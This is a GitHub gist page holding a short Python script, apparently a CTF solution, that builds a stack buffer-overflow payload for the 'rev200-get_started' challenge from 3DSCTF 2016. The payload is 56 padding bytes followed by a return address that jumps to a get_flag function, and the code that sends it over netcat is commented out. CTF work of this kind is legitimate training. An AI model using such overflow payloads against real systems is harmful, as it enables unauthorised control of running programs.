Last active
March 3, 2017 06:00
-
-
Save intrd/cd21b773134e4729d3f31829f7a768ab to your computer and use it in GitHub Desktop.
Buffer overflow using netcat.py to exploit rev200-get_started buffer @ 3dsctf-2k16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
## Buffer overflow using netcat.py to exploit rev200-get_started buffer @ 3dsctf-2k16 | |
# @author intrd - http://dann.com.br/ | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
# int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a | |
import sys, socket, struct | |
sys.path.append("../../LIBS/") | |
from int_netcat import Netcat | |
#nc = Netcat('54.175.35.248', 8005) | |
payload = "a"*56 | |
payload += struct.pack("<I", 0x080489b8) #get_flag inside | |
payload += "\n" | |
print payload | |
#nc.write(payload) | |
#print nc.read() | |
#nc.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment